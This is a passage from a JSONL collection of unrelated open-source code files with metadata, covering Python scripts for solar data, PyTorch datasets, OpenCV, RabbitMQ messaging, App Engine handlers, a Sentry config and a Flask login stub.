H_o_bar_loc[j,i-1] = np.mean(H_o);\n\n#Calculate surface radiation by location\nH_bar_loc = np.multiply(KT,H_o_bar_loc);\n\n#Combine the values by state\nfor k in mon:\n p = -1;\n for m in st:\n n = 0;\n p = p+1;\n while state_raw[p] == state_raw[p+1] and p < 235:\n p = p+1;\n n = n+1;\n H_bar_state[m,k-1] = np.mean(H_bar_loc[p-n:p+1,k-1])/1000000;\n\n#Sorting by state\nstate = [];\nfor q in state_raw:\n if q not in state:\n state.append(q);\nstate = np.transpose(state);\n\n#Combine for all months and create data frame\nH_bar_state_year = np.mean(H_bar_state, axis=1);\nd_year = {'State': state, 'Value': H_bar_state_year};\ndf_year = pd.DataFrame(data=d_year);\nprint(df_year);\n\n#End timer\nend_time = time.time();\nprint(\"---%s seconds---\" %(end_time-start_time));\n\n","sub_path":"solar_ser_ng.py","file_name":"solar_ser_ng.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"131628069","text":"import math\nimport numpy as np\n\nimport torch\nimport torchvision\nfrom torchvision import datasets, transforms\nfrom torch_geometric.data import InMemoryDataset, Data\n\n\nclass ImageDataset(InMemoryDataset):\n def __init__(self,\n root,\n name,\n train=True,\n transform=None,\n pre_transform=None,\n pre_filter=None,\n coord=False,\n processed_file_prefix='data'):\n assert name in ['MNIST', 'CIFAR10'], \"Unsupported data name %s\" % name\n self.name = name\n self.coord = coord\n self.processed_file_prefix = processed_file_prefix\n self.traindata = None\n self.testdata = None\n super(ImageDataset, self).__init__(\n root, transform, pre_transform, pre_filter)\n path = self.processed_paths[0] if train else self.processed_paths[1]\n self.data, self.slices = torch.load(path)\n\n @property\n def raw_file_names(self):\n if self.name == 'MNIST':\n return ['t10k-images-idx3-ubyte', 't10k-labels-idx1-ubyte',\n 'train-images-idx3-ubyte', 'train-labels-idx1-ubyte']\n elif self.name == 'CIFAR10':\n return ['data_batch_1', 'data_batch_2', 'data_batch_3',\n 'data_batch_4', 'data_batch_5', 'test_batch']\n\n @property\n def processed_file_names(self):\n return ['%s_training.pt' % self.processed_file_prefix,\n '%s_test.pt' % self.processed_file_prefix]\n\n def download(self):\n transform = transforms.ToTensor()\n if self.name == 'CIFAR10':\n data_train = datasets.CIFAR10(root=self.raw_dir,\n transform=transform,\n train=True,\n download=True)\n data_test = datasets.CIFAR10(root=self.raw_dir,\n transform=transform,\n train=False,\n download=True)\n elif self.name == 'MNIST':\n data_train = datasets.MNIST(root=self.raw_dir,\n transform=transform,\n train=True,\n download=True)\n data_test = datasets.MNIST(root=self.raw_dir,\n transform=transform,\n train=False,\n download=True)\n else:\n raise ValueError(\"Unknown data name {}\".format(self.name))\n self.traindata = data_train\n self.testdata = data_test\n\n def process(self):\n trainLoader = torch.utils.data.DataLoader(self.traindata)\n testLoader = torch.utils.data.DataLoader(self.testdata)\n if self.name == 'MNIST':\n num_row, num_col = 28, 28\n elif self.name == 'CIFAR10':\n num_row, num_col = 32, 32\n else:\n raise ValueError('dataset error')\n num_edges = (3 * num_row - 2) * (3 * num_col - 2)\n edge_index_array = np.zeros(shape=[2, num_edges])\n edge_attr_array = np.zeros(shape=[1, num_edges])\n curt = 0\n for j in range(num_row):\n for k in range(num_col):\n for m in range(max(j-1, 0), min(j+1, num_row-1)+1):\n for n in range(max(k-1, 0), min(k+1, num_col-1)+1):\n edge_index_array[0][curt] = j * num_row + k\n edge_index_array[1][curt] = m * num_row + n\n edge_attr_array[0][curt] = self.weight(j, k, m, n)\n curt += 1\n edge_index = torch.from_numpy(edge_index_array).to(torch.int64)\n edge_attr = torch.from_numpy(edge_attr_array).to(torch.float)\n\n def transform_data(data_loader, edge_index, edge_attr):\n data_list = []\n channel, num_row, num_col = data_loader.dataset[0][0].size()\n if self.coord:\n x = torch.arange(num_col, dtype=torch.float)\n x = x.view((1, -1)).repeat(num_row, 1).view((-1, 1)) - x.mean()\n y = torch.arange(num_row, dtype=torch.float)\n y = y.view((-1, 1)).repeat(1, num_col).view((-1, 1)) - y.mean()\n coord = torch.cat([x, y], -1)\n\n for image, label in iter(data_loader):\n x = image[0].permute([1,2,0]).view(\n num_row * num_col, image[0].size()[0])\n if self.coord:\n x = torch.cat([x, coord], -1)\n data = Data(\n edge_index=edge_index, edge_attr=edge_attr, x=x, y=label)\n if self.pre_filter is not None:\n data = self.pre_filter(data)\n if self.pre_transform is not None:\n data = self.pre_transform(data)\n data_list.append(data)\n return data_list\n\n train_data_list = transform_data(trainLoader, edge_index, edge_attr)\n torch.save(self.collate(train_data_list), self.processed_paths[0])\n\n test_data_list = transform_data(testLoader, edge_index, edge_attr)\n torch.save(self.collate(test_data_list), self.processed_paths[1])\n\n @staticmethod\n def weight(pos_x, pos_y, pos_x_new, pos_y_new):\n dist = (pos_x - pos_x_new) ** 2 + (pos_y - pos_y_new) ** 2\n return math.exp(-dist)\n\n def __repr__(self):\n return '{}({})'.format(self.name, len(self))\n\n","sub_path":"semisupervised_TU/finetuning/image_dataset.py","file_name":"image_dataset.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"558651849","text":"import numpy as np\nimport cv2 as cv\n\n# Get image in color\n# img = cv.imread('./action.jpg', cv.IMREAD_COLOR)\n# Get image in gray scale\nimg = cv.imread('./action.jpg', cv.IMREAD_GRAYSCALE)\n# img = cv.imread('./action.jpg', cv.IMREAD_UNCHANGED)\n\n# Show image in window normal not in the image original dimensions\ncv.namedWindow('image', cv.WINDOW_NORMAL)\n\n# Show the image\ncv.imshow('image', img)\n\n# Wait infenitely if is zero\nk = cv.waitKey(0)\n\n# wait for ESC key to exit\nif k == 27:\n cv.destroyAllWindows()\n\n# wait for 's' key to save and exit\nelif k == ord('s'):\n # Save image\n cv.imwrite('image_output.png', img)\n cv.destroyAllWindows()\n","sub_path":"Images/read_image_demo.py","file_name":"read_image_demo.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"597461739","text":"from PyEscape.escape_plan import escape\nfrom PyEscape.escape_points import fibonacci_spheres, points_on_cube_surface\nfrom PyEscape.escape_utility import sphere_vol_to_r\nfrom PyEscape.escape_points import random_points_on_hull\nfrom PyEscape.escape_points import random_points_on_ellipsoid\nfrom PyEscape.escape_polygonhelper import make_hull_and_scale\nimport pytest\nimport numpy as np\n\n\ndef test_escape():\n D = 400\n v = 1\n a = 0.1\n r = sphere_vol_to_r(v)\n pores = fibonacci_spheres(1, r)\n t = escape(D, v, a, pores, dt=1e-6)\n assert t\n\n\ndef test_escape_cube():\n D = 400\n v = 1\n a = 0.1\n r = sphere_vol_to_r(v)\n pores = points_on_cube_surface(1, r)\n t = escape(D, v, a, pores, shape='cube', dt=1e-6)\n assert t\n\n\ndef test_escape_ellipsoid():\n D = 400\n v = 1\n a = 0.1\n ABC = [3, 2, 1]\n pores = random_points_on_ellipsoid(ABC, v)\n t = escape(D, v, a, pores, shape='ellipsoid', dt=1e-6, ABC=ABC)\n assert t\n\n\ndef test_avg_escape_sphere_time():\n N = 10\n D = 400\n v = 1\n a = 0.1\n r = sphere_vol_to_r(v)\n pores = fibonacci_spheres(1, r)\n ts = np.mean([escape(D, v, a, pores, dt=1e-6) for _ in range(N)])\n assert 0.001 < ts < 1\n\n\ndef test_timeout():\n D = 400\n v = 1\n a = 0.1\n r = sphere_vol_to_r(v)\n pores = fibonacci_spheres(1, r)\n t = escape(D, v, a, pores, dt=1e-6)\n assert int(t) == 0\n\n\ndef test_timeout_from_dt():\n D = 400\n v = 1\n a = 0.1\n r = sphere_vol_to_r(v)\n pores = fibonacci_spheres(1, r)\n t = escape(D, v, a, pores, max_steps=5, dt=1e-6)\n assert int(t) == 0\n\n\ndef test_escape_polygon():\n D = 400\n v = 1\n a = 0.1\n hull, _ = make_hull_and_scale(np.random.random((10, 3)))\n pores = random_points_on_hull(hull)\n t = escape(D, v, a, pores, dt=1e-6, hull=hull, shape='polygon')\n assert t\n","sub_path":"Testing/test_escape.py","file_name":"test_escape.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481247804","text":"# -*- coding:utf-8 -*-\r\n#\r\nimport pika\r\nfrom pika import spec\r\n\r\n# 创建简单的连接凭证\r\ncredentials = pika.PlainCredentials(\"test\", \"test\")\r\n# 连接参数\r\nhost = \"localhost\"\r\nhost = \"192.168.181.130\"\r\nport = 5672\r\nconn_params = pika.ConnectionParameters(host=host, port=port, credentials=credentials) # 没有指定virtual_host,使用默认的'/'\r\n# 建立一个实例\r\n# 1. 建立到代理服务器的连接\r\nconn_broker = pika.BlockingConnection(conn_params)\r\n\r\n# 2. 声明一个管道,在管道里发消息 # 获得信道\r\nchannel = conn_broker.channel()\r\n\r\n##################################################\r\nmsg_ids = []\r\n# 发送方确认模式处理器\r\n# def confirm_handler(frame):\r\n# if type(frame.method) == spec.Confirm.SelectOk:\r\n# print \"Channel in 'confirm' mode.\"\r\n# elif type(frame.method) == spec.Basic.Nack:\r\n# if frame.method.delivery_tag in msg_ids:\r\n# print 'Message lost!'\r\n# elif type(frame.method) == spec.Basic.Ack:\r\n# if frame.method.delivery_tag in msg_ids:\r\n# print 'Confirm received'\r\n# msg_ids.remove(frame.method.delivery_tag)\r\n#\r\n# channel.confirm_delivery(callback=confirm_handler)\r\n##################################################\r\n\r\n# 3. 声明交换器\r\nexchange = \"hello-exchange\"\r\nchannel.exchange_declare(exchange=exchange,\r\n exchange_type='direct',\r\n passive=False,\r\n durable=True,\r\n auto_delete=False)\r\n\r\n# 4. 在管道里声明queue, 这一步没有 queuename 将和 routing_key 名称一样\r\nqueue_name = \"hello-queue\"\r\nrouting_key = \"hola-key\"\r\nchannel.queue_declare(queue=queue_name)\r\n# 通过键\"hola-key\"将队列和交换器绑定起来\r\nchannel.queue_bind(queue=queue_name,\r\n exchange=exchange,\r\n routing_key=routing_key)\r\n\r\n# 5. 创建文本消息\r\n# msg =sys.argv[1]\r\nmsg = u\"hello world 杨城\"\r\nmsg_props = pika.BasicProperties()\r\nmsg_props.content_type = \"text/plain\"\r\n\r\nchannel.basic_qos(prefetch_count=1) # 类似权重,按能力分发,如果有一个消息,就不在给你发\r\n\r\n# 6. 发布消息\r\nimport time\r\nwhile True:\r\n time.sleep(1)\r\n channel.basic_publish(body=msg,\r\n exchange=exchange,\r\n properties=msg_props,\r\n routing_key=routing_key)\r\n # msg_ids.append(len(msg_ids) + 1) #/(hwppc.5) Add ID to tracking list\r\n\r\nchannel.close()\r\n\r\n","sub_path":"RabbitMQ2/code/1.hello_producer.py","file_name":"1.hello_producer.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"378050775","text":"import sys\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QHBoxLayout, QFileDialog, \\\n QLabel, QPushButton\n\n\nclass ScriptUI(QWidget):\n def __init__(self):\n super().__init__()\n\n self.label = QLabel()\n self.btn = QPushButton('File Open')\n\n self.InitUI()\n\n def InitUI(self):\n self.btn.clicked.connect(self.openFile)\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.label, 3)\n hbox.addWidget(self.btn, 1)\n vbox = QVBoxLayout()\n vbox.addLayout(hbox)\n vbox.addStretch(1)\n self.setLayout(vbox)\n\n def openFile(self):\n fname = QFileDialog.getOpenFileName(self, 'File Open', './config/script')\n self.label.setText(fname[0])\n if fname[0]:\n with open(fname[0], 'r') as f:\n data = f.read()\n","sub_path":"src/ScriptUI.py","file_name":"ScriptUI.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"516653285","text":"\nclass Solution(object):\n \"\"\"\n @ Google\n \n Given a non-empty string s and an abbreviation abbr, return whether the string matches with the given abbreviation.\n\n A string such as \"word\" contains only the following valid abbreviations:\n [\"word\", \"1ord\", \"w1rd\", \"wo1d\", \"wor1\", \"2rd\", \"w2d\", \"wo2\", \"1o1d\", \"1or1\", \"w1r1\", \"1o2\", \"2r1\", \"3d\", \"w3\", \"4\"]\n\n Notice that only the above abbreviations are valid abbreviations of the string \"word\". Any other string is not a valid abbreviation of \"word\".\n\n Note:\n Assume s contains only lowercase letters and abbr contains only lowercase letters and digits.\n\n Example 1:\n Given s = \"internationalization\", abbr = \"i12iz4n\":\n\n Return true.\n Example 2:\n Given s = \"apple\", abbr = \"a2e\":\n\n Return false.\n \"\"\"\n def validWordAbbreviation(self, word, abbr): # O(n) time\n \"\"\"\n :type word: str\n :type abbr: str\n :rtype: bool\n \"\"\"\n chars = \"abcdefghijklmnopqrstuvwxyz\"\n nums = \"0123456789\"\n if len(abbr) > len(word):\n return False\n word = word.lower()\n i, j = 0, 0\n while i < len(word) and j < len(abbr):\n if abbr[j].lower() in chars:\n if abbr[j].lower() == word[i]:\n i += 1\n j += 1\n else:\n return False\n elif abbr[j] == '0':\n return False\n elif abbr[j] in nums:\n k = j\n while k < len(abbr) and abbr[k] in nums:\n k += 1\n i += int(abbr[j:k])\n j = k\n if j == len(abbr) or i == len(word):\n break\n return i == len(word) and j == len(abbr)","sub_path":"src/string/leetcode408_ValidWordAbbreviation.py","file_name":"leetcode408_ValidWordAbbreviation.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"57135706","text":"#\n#\tpython modular sorting animation\n#\tfile: mod_gen.py\n# description: mod_gen contains array manipulation functions\n# to create datasets for the sort animation\n#\tlicense: py-mod-sort/LICENSE (Apache 2.0)\n#\tby: Patrick Stanislaw Hadlaw\n#\n\nimport tkinter as tk\nimport random\nimport time\nimport math\nimport copy\n\n#\n# Array Generators\n#\n\ndef randomArray(size, flip = False):\n arr = list(range(size))\n for i in range(0, size*10):\n r1 = random.randint(0, size-1)\n r2 = random.randint(0, size-1)\n tmp = arr[r2]\n arr[r2] = arr[r1]\n arr[r1] = tmp\n if flip:\n return list(reversed(arr))\n else:\n return arr\n\ndef randomElement(size, flip = False):\n arr = []\n for i in range(0, size):\n arr.append(random.randint(0, size-1))\n if flip:\n return list(reversed(arr))\n else:\n return arr\n\ndef block(size, blocks, flip = False):\n blockLen = int(size / blocks)\n arr = []\n for i in range(1, blocks+1):\n for j in range(0, blockLen):\n arr.append(i*blockLen)\n if i + 1 > blocks and len(arr) enddate)\n cat = []\n for s in stories:\n for i in s.category:\n if i not in cat and i != u'':\n cat.append(i)\n template_values = {\n 'stories': stories,\n 'year': year,\n 'cat':cat\n }\n template = jinja_environment.get_template('index.html')\n self.response.out.write(template.render(template_values))\n\nclass YearHandler(webapp2.RequestHandler):\n def get(self):\n year = []\n x = int(start_year)\n year.append(x)\n for x in range(x, datetime.now().year):\n x = (x + 1)\n year.append(x)\n startdate = date(int(self.request.get('year')), 1, 1)\n enddate = date(int(self.request.get('year')), 12, 31)\n stories = Story.query().filter(Story.date >= startdate).order(-Story.date)\n stories = stories.filter(Story.date < enddate)\n cat = []\n for s in stories:\n for i in s.category:\n if i not in cat and i != u'':\n cat.append(i)\n template_values = {\n 'stories': stories,\n 'year': year,\n 'cat': cat,\n }\n template = jinja_environment.get_template('index.html')\n self.response.out.write(template.render(template_values))\n\nclass CategoryHandler(webapp2.RequestHandler):\n def get(self):\n stories = Story.query().filter(Story.category == self.request.get('category')).order(-Story.date)\n year = []\n x = int(start_year)\n year.append(x)\n for x in range(x, datetime.now().year):\n x = (x + 1)\n year.append(x)\n cat = []\n for s in stories:\n for i in s.category:\n if i not in cat and i != u'':\n cat.append(i)\n template_values = {\n 'stories': stories,\n 'year': year,\n 'cat': cat,\n }\n template = jinja_environment.get_template('index.html')\n self.response.out.write(template.render(template_values))\n\nclass TitleHandler(webapp2.RequestHandler):\n def get(self):\n stories = Story.query().filter(Story.title == self.request.get('title')).order(-Story.date)\n year = []\n x = int(start_year)\n year.append(x)\n for x in range(x, datetime.now().year):\n x = (x + 1)\n year.append(x)\n cat = []\n for s in stories:\n for i in s.category:\n if i not in cat and i != u'':\n cat.append(i)\n template_values = {\n 'stories': stories,\n 'year': year,\n 'cat': cat,\n }\n template = jinja_environment.get_template('index.html')\n self.response.out.write(template.render(template_values))\n\nclass CoverHandler(webapp2.RequestHandler):\n def get(self):\n template_values = {\n }\n template = jinja_environment.get_template('cover.html')\n self.response.out.write(template.render(template_values))\n\n#class ContactHandler(webapp2.RequestHandler):\n# def get(self):\n# email = self.request.get('email')\n# template_values = {\n# 'email': email,\n# }\n# template = jinja_environment.get_template('contact.html')\n# self.response.out.write(template.render(template_values))\n\nclass LocationHandler(webapp2.RequestHandler):\n def get(self):\n template_values = {\n }\n template = jinja_environment.get_template('location.html')\n self.response.out.write(template.render(template_values))\n\n# URL settings --------------------------------------------\napp = webapp2.WSGIApplication([\n ('/', MainHandler),\n #('/contact', ContactHandler),\n ('/location', LocationHandler),\n ('/month', MonthHandler),\n ('/year', YearHandler),\n ('/category', CategoryHandler),\n ('/title', TitleHandler),\n ('/cover', CoverHandler),\n ('/addstory', AddHandler),\n ('/newstory', NewHandler),\n ('/liststories', ListHandler),\n ('/delstory', DelHandler),\n ('/editstory', EditHandler),\n ('/savestory', SaveHandler),\n ('/admin', ListHandler),\n ('/spm', PortfolioMailHandler),\n ('/unm', UnMailHandler),\n ('/maillist', MailListHandler),\n ('/delmail', DelMailHandler),\n ('/addmail', AddMailHandler),\n ('/savemail', SaveMailHandler),\n ('/purgemail', PurgeMailHandler),\n], debug=False)\n\n# Error handlers\napp.error_handlers[401] = Handler_401 # Wrong Authentication\napp.error_handlers[402] = Handler_402 # Requires some Payments to be done\napp.error_handlers[403] = Handler_403 # Authentication required, no public access\napp.error_handlers[404] = Handler_404 # Web page does not exist/Required content not found\napp.error_handlers[405] = Handler_405 # Method of sending data is not allowed\napp.error_handlers[500] = Handler_500 # Internal server error","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":26770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"456701388","text":"import logging\n\nfrom osaapi import OSA\nimport requests\n\nfrom apslite_agent.config import get_config\nfrom apslite_agent.tasks import base\n\nlogger = logging.getLogger(__name__)\n\n\nclass CreateSession(base.Task):\n name = 'create_session'\n\n def __init__(self, config):\n self.openapi = config.get('openapi', {})\n self.rest_url = config.get('rest_url', '')\n\n def run(self):\n if not self.openapi:\n return self.result('Error', \"Improperly configured\")\n\n if self.data.get('version'):\n logger.info(\"Set account CCP account_id - %s version - %s\",\n self.data.get('account_id'),\n self.data.get('version'))\n\n api = OSA(**self.openapi)\n ret = api.am.setAccountCCPVersion(\n account_id=self.data.get('account_id'),\n ccp_version=self.data.get('version')\n )\n\n logger.info(\"result set version - %s\", ret)\n\n if 'error' in ret or ('status' in ret and ret['status'] != 0):\n error_message = ret['message'] if 'message' in ret else 'Error'\n return self.result('Error', error_message)\n\n url = 'http://{host}:{port}{url}'.format(\n host=self.openapi.get('host'),\n port=8080,\n url=self.data.get('url')\n )\n\n try:\n logger.info(\"Request to create OA session\")\n res = requests.post(url, timeout=20, verify=False)\n session_id = res.content.decode('utf-8').split('=')[1].replace('\\n', '')\n logger.info(\"Created OA session - %s\", session_id)\n except Exception as e:\n logger.exception(\"Failed to create session\")\n try:\n logger.debug(\"Response from OA: %s\", res.content)\n except:\n pass\n return self.result('Error', str(e))\n\n return self.result('OK', data={\n 'session_id': session_id\n })\n\n\ndef task_factory(**kwargs):\n c = get_config()\n oa = c.get('oa', {})\n\n return {\n CreateSession.name: CreateSession(oa)\n }\n","sub_path":"apslite_agent/tasks/create_session.py","file_name":"create_session.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"138425948","text":"# python - problem 20\n\nimport math\nimport time\n\nt = time.time()\n\nmul1 = 1\nfor i in range(1,101):\n mul1 *= i\nmul2 = str(mul1)\nlength = len(mul2)\n\nsum = 0\nfor i in range(0, length):\n sum += int(mul2[i])\n\nprint(sum)\n\nt = time.time()-t\nprint( \"Spend time :\", t , \"sec\")","sub_path":"problem 020.py","file_name":"problem 020.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"3760465","text":"'''\nLoaders for all object recognition pipelines\n'''\nfrom abc import ABCMeta, abstractmethod\n\nimport ecto\nfrom ecto_object_recognition.object_recognition_db import ObservationReader\nfrom object_recognition.common.utils import list_to_cpp_json_str\nfrom object_recognition.common.utils.json_helper import dict_to_cpp_json_str\n\nclass ObservationDealer(ecto.BlackBox):\n '''\n At each iteration, will return one fully typed observation, K,R,T,image,depth,mask, etc...\n Initialized with a predetermined set of observation ids.\n '''\n db_reader = ObservationReader\n def declare_params(self, p):\n p.declare('observation_ids', 'An iterable of observation ids.', [])\n p.declare('db_params', 'db parameters.', '')\n\n def declare_io(self, p, i, o):\n self.db_reader = ObservationReader(db_params=p.db_params)\n self.observation_dealer = ecto.Dealer(tendril=self.db_reader.inputs.at('observation'),\n iterable=p.observation_ids)\n o.forward_all('db_reader')\n\n def connections(self):\n graph = [self.observation_dealer[:] >> self.db_reader['observation']]\n return graph\n\nclass ModelBuilder(ecto.BlackBox):\n def __init__(self, source, incremental_model_builder, **kwargs):\n self.source = source\n self.incremental_model_builder = incremental_model_builder\n ecto.BlackBox.__init__(self, **kwargs)\n\n def declare_params(self, p):\n pass\n\n def declare_io(self, p, i, o):\n o.forward_all('incremental_model_builder')\n\n def connections(self):\n graph = []\n # Connect the model builder to the source\n for key in self.source.outputs.iterkeys():\n if key in self.incremental_model_builder.inputs.keys():\n graph += [self.source[key] >> self.incremental_model_builder[key]]\n return graph\n\nclass TrainingPipeline:\n ''' An abstract base class for creating object training pipelines.\n '''\n __metaclass__ = ABCMeta\n\n @classmethod\n def type_name(cls):\n '''\n Return the code name for your pipeline. eg. 'TOD', 'LINEMOD', 'mesh', etc...\n '''\n raise NotImplementedError(\"The training pipeline class must return a string name.\")\n\n @abstractmethod\n def incremental_model_builder(self, submethod, pipeline_params, args):\n '''\n Given a dictionary of parameters, return a cell, or BlackBox that takes\n as input observations, and at each iteration and builds up a model\n on its output.\n '''\n raise NotImplementedError(\"This should return a cell .\")\n\n\n @abstractmethod\n def post_processor(self, submethod, pipeline_params, args):\n '''\n Given a dictionary of parameters, return a cell, or BlackBox that\n takes the output of the incremental_model_builder and converts it into\n a database document. You may do whatever post processing here.\n '''\n raise NotImplementedError(\"This should return a cell .\")\n\n\n @classmethod #see http://docs.python.org/library/abc.html#abc.ABCMeta.__subclasshook__\n def __subclasshook__(cls, C):\n if C is TrainingPipeline:\n #all pipelines must have atleast this function.\n if any(\"incremental_model_builder\" in B.__dict__ for B in C.__mro__):\n return True\n return NotImplemented\n\n @classmethod\n def train(cls, object_id, session_ids, observation_ids, submethod, pipeline_params, db_params, args=None):\n '''\n Returns a training plasm, that will be executed exactly once.\n :param object_id: The object id to train up.\n :param session_ids: A list of session ids that this model should be based on.\n :param observation_ids: A list of observation ids that will be dealt to the incremental model builder.\n :param submethod: A dictionary of discriminative parameters that will be used to initialize the\n training pipeline.\n :param pipeline_params: A dictionary of non-discriminative parameters that will be used to initialize the\n training pipeline.\n :param db_params: A DB parameters object that specifies where to save the model to.\n :param args: General command line args, for things like visualize or what have you.\n :returns: A plasm, only execute once please.\n '''\n from ecto_object_recognition.object_recognition_db import ModelWriter\n\n #todo make this depend on the pipeline specification or something...\n dealer = ObservationDealer(db_params=db_params, observation_ids=observation_ids)\n\n pipeline = cls()\n incremental_model_builder = pipeline.incremental_model_builder(submethod, pipeline_params, args)\n model_builder = ModelBuilder(source=dealer,\n incremental_model_builder=incremental_model_builder,\n niter=0,\n ) #execute until a quit condition occurs.\n post_process = pipeline.post_processor(submethod, pipeline_params, args)\n\n plasm = ecto.Plasm()\n # Connect the model builder to the source\n for key in set(model_builder.outputs.keys()).intersection(post_process.inputs.keys()):\n plasm.connect(model_builder[key] >> post_process[key])\n\n writer = ModelWriter(db_params=db_params,\n object_id=object_id,\n session_ids=list_to_cpp_json_str(session_ids),\n method=cls.type_name(),\n json_submethod=dict_to_cpp_json_str(submethod),\n json_parameters=dict_to_cpp_json_str(pipeline_params),\n )\n plasm.connect(post_process[\"db_document\"] >> writer[\"db_document\"])\n return plasm\n","sub_path":"python/object_recognition/pipelines/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"201617412","text":"import os.path\n\nCONF_ROOT = os.path.dirname(__file__)\n\n# For Sentry on Openshift, choose either mysql or postgresql_psycopg2 for ENGINE\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': os.environ['OPENSHIFT_APP_NAME'], # Or path to database file if using sqlite3.\n }\n}\n\ntry:\n env_db_name = {\n 'django.db.backends.mysql': 'MYSQL',\n 'django.db.backends.postgresql_psycopg2': 'POSTGRESQL'\n }[DATABASES['default']['ENGINE']]\nexcept KeyError:\n import sys\n sys.exit(\"Please set the database engine to django.db.backends.mysql or django.db.backends.postgresql_psycopg2 for this Sentry Openshift setup.\")\n\nDATABASES['default'].update({\n 'USER': os.environ['OPENSHIFT_%s_DB_USERNAME' % env_db_name ], # Not used with sqlite3.\n 'PASSWORD': os.environ['OPENSHIFT_%s_DB_PASSWORD' % env_db_name], # Not used with sqlite3.\n 'HOST': os.environ['OPENSHIFT_%s_DB_HOST' % env_db_name], # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': os.environ['OPENSHIFT_%s_DB_PORT' % env_db_name], # Set to empty string for default. Not used with sqlite3.\n})\n\n\n# Edit this!\nSENTRY_KEY = 'super_secret_key'\n\n# Set this to false to require authentication\nSENTRY_PUBLIC = False\n\n# You should configure the absolute URI to Sentry. It will attempt to guess it if you don't\n# but proxies may interfere with this.\n# SENTRY_URL_PREFIX = 'http://sentry.example.com' # No trailing slash!\n\nSENTRY_WEB_HOST = os.environ['OPENSHIFT_INTERNAL_IP']\nSENTRY_WEB_PORT = os.environ['OPENSHIFT_INTERNAL_PORT']\nSENTRY_WEB_OPTIONS = {\n 'workers': 3, # the number of gunicorn workers\n # 'worker_class': 'gevent',\n 'daemon':True,\n 'pid': '%s/%s' % (os.environ['OPENSHIFT_DATA_DIR'],'gunicorn.pid'), # gunicorn pid file\n 'log-file': '%s/%s' % (os.environ['OPENSHIFT_DIY_LOG_DIR'],'gunicorn_out.log'), # gunicorn the Error log file\n #'access-logfile': '%s%s' % (os.environ['OPENSHIFT_DIY_LOG_DIR'],'gunicorn_access.log'), # gunicorn the Error log file\n\n}\n# Mail server configuration\n\n# For more information check Django's documentation:\n# https://docs.djangoproject.com/en/1.3/topics/email/?from=olddocs#e-mail-backends\n\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n\nEMAIL_HOST = 'localhost'\nEMAIL_HOST_PASSWORD = ''\nEMAIL_HOST_USER = ''\nEMAIL_PORT = 25\nEMAIL_USE_TLS = False\n\n# http://twitter.com/apps/new\n# It's important that input a callback URL, even if its useless. We have no idea why, consult Twitter.\nTWITTER_CONSUMER_KEY = ''\nTWITTER_CONSUMER_SECRET = ''\n\n# http://developers.facebook.com/setup/\nFACEBOOK_APP_ID = ''\nFACEBOOK_API_SECRET = ''\n\n# http://code.google.com/apis/accounts/docs/OAuth2.html#Registering\nGOOGLE_OAUTH2_CLIENT_ID = ''\nGOOGLE_OAUTH2_CLIENT_SECRET = ''\n\n# https://github.com/settings/applications/new\nGITHUB_APP_ID = ''\nGITHUB_API_SECRET = ''\n\n# https://trello.com/1/appKey/generate\nTRELLO_API_KEY = ''\nTRELLO_API_SECRET = ''\n","sub_path":"sentry.conf.py","file_name":"sentry.conf.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"109014428","text":"\nfrom django.conf.urls import url, include\n\nfrom chat import views\n\n# API endpoints\n\nurlpatterns = [\n\turl(r'^$', views.api_root),\n\turl(r'^client/$', views.client, name='client'),\n\turl(r'^users/$', views.user_list, name='user-list'),\n\turl(r'^users/(?P[0-9]+)/$', views.user_del, name='user-del'),\n\turl(r'^messages/$', views.message_list, name='message-list'),\n\turl(r'^messages/history/$', views.message_history, name='message-history'),\n\n\turl(r'^messages/send$', views.send, name='send'),\n\turl(r'^messages/poll$', views.poll, name='poll'),\n\n]\n\nurlpatterns += [\n\turl(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))\n]","sub_path":"chat/urls_chat.py","file_name":"urls_chat.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"576922726","text":"# main site by flask\n\nfrom flask import Flask, render_template, request, url_for\nfrom login import login_check\n\napp = Flask(__name__, static_url_path='/static')\n\n# '/'\n# index.html\n@app.route('/')\ndef main_get(num=None):\n return render_template('index.html', num=num)\n\n\n# '/login'\n# check by hisnet_id, hisnet_pwd\n@app.route('/login', methods=['POST', 'GET'])\ndef login(num=None):\n \n if request.method == 'GET':\n ## 넘겨받은 id&pwd\n id = request.args.get('id')\n pwd = request.args.get('pwd')\n\n ## 넘겨받은 값을 원래 페이지로 